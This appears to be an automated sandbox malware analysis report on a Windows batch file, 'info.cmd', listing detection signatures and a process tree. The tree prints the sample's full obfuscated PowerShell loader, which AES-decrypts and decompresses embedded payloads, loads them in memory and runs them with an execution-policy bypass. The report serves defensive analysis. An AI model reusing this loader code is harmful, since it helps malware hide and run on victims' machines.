Windows
Analysis Report
info.cmd
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 5448 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\info. cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 2464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 4940 cmdline:
cmd /c "se t __=^&rem " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) cmd.exe (PID: 5656 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho functio n decrypt_ function($ param_var) { $aes_var =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $ae s_var.Mode =[System.S ecurity.Cr yptography .CipherMod e]::CBC; $ aes_var.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $ae s_var.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('pP LpJHM4GQSp 820ezozLIn ZkcLGjwzAf hFyAUo/d1y U='); $aes _var.IV=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('kFkM a+H0Xjazq+ yg0jtHMw== '); $decry ptor_var=$ aes_var.Cr eateDecryp tor(); $re turn_var=$ decryptor_ var.Transf ormFinalBl ock($param _var, 0, $ param_var. Length); $ decryptor_ var.Dispos e(); $aes_ var.Dispos e(); $retu rn_var;}fu nction dec ompress_fu nction($pa ram_var){ $liFcl=New -Object Sy stem.IO.Me moryStream (,$param_v ar); $YKPP P=New-Obje ct System. IO.MemoryS tream; $Dr FOQ=New-Ob ject Syste m.IO.Compr ession.GZi pStream($l iFcl, [IO. Compressio n.Compress ionMode]:: Decompress ); $DrFOQ. CopyTo($YK PPP); $DrF OQ.Dispose (); $liFcl .Dispose() ; $YKPPP.D ispose(); $YKPPP.ToA rray();}fu nction exe cute_funct ion($param _var,$para m2_var){ $ aGqbX=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $param_var ); $rErds= $aGqbX.Ent ryPoint; $ rErds.Invo ke($null, $param2_va r);}$UsDBW = 'C:\Use rs\user\De sktop\info .cmd';$hos t.UI.RawUI .WindowTit le = $UsDB W;$rybfn=[ System.IO. File]::('t xeTllAdaeR '[-1..-11] -join '') ($UsDBW).S plit([Envi ronment]:: NewLine);f oreach ($b SMhM in $r ybfn) { if ($bSMhM.S tartsWith( 'WUgLizIwo CqVFjuaxzX G')) { $FY rof=$bSMhM .Substring (20); brea k; }}$payl oads_var=[ string[]]$ FYrof.Spli t('\');$pa yload1_var =decompres s_function (decrypt_ function ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $payloads_ var[0].Rep lace('#', '/').Repla ce('@', 'A '))));$pay load2_var= decompress _function (decrypt_f unction ([ Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')($ payloads_v ar[1].Repl ace('#', ' /').Replac e('@', 'A' ))));execu te_functio n $payload 1_var $nul l;execute_ function $ payload2_v ar (,[stri ng[]] ('') ); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 5536 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s MD5: 04029E121A0CFA5991749937DD22A1D9) wermgr.exe (PID: 3360 cmdline:
"C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "5 536" "1456 " "1404" " 1220" "0" "0" "1504" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Hieu Tran: |